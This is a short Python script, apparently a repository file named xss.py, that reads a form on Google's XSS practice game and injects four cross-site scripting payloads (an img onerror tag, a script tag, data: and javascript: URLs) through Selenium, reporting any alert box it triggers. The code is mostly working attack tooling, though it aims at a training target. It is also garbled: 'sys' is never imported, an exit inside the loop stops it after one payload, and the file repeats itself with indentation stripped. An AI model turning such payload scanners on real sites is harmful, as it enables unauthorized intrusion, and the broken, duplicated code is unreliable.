miglen/xss.py

## xss.py
import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException

url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)

form = soup.find('form')
print()
payloads = [
    "<img src=x onerror=alert(1)>",
    "<script>alert(2)</script>",
    "data:text/plain,alert(3)",
    "javascript:alert(4)"
]

def encode_url(url, params):
    params_encoded = urllib.parse.urlencode(params)
    full_url = url + "?" + params_encoded
    return full_url

for payload in payloads:
    params = {}
    for input in form.find_all('input'):
        if input.has_attr('name'):
            params[input['name']] = payload
    url_to_send = encode_url(url, params)
    browser = webdriver.Firefox()
    browser.get(url_to_send)
    time.sleep(1)
    if browser.switch_to.alert.text is not None:
        print(f"XSS Found in: {url} with : {params}")
    browser.quit()
    sys.exit(0)
	import requests
	import time
	import urllib.parse
	from bs4 import BeautifulSoup
	from selenium import webdriver
	from selenium.common.exceptions import NoAlertPresentException

	url = "https://xss-game.appspot.com/level1/frame"
	response = requests.get(url)
	soup = BeautifulSoup(response.text)

	form = soup.find('form')
	print()
	payloads = [
	"<img src=x onerror=alert(1)>",
	"<script>alert(2)</script>",
	"data:text/plain,alert(3)",
	"javascript:alert(4)"
	]

	def encode_url(url, params):
	params_encoded = urllib.parse.urlencode(params)
	full_url = url + "?" + params_encoded
	return full_url

	for payload in payloads:
	params = {}
	for input in form.find_all('input'):
	if input.has_attr('name'):
	params[input['name']] = payload
	url_to_send = encode_url(url, params)
	browser = webdriver.Firefox()
	browser.get(url_to_send)
	time.sleep(1)
	if browser.switch_to.alert.text is not None:
	print(f"XSS Found in: {url} with : {params}")
	browser.quit()
	sys.exit(0)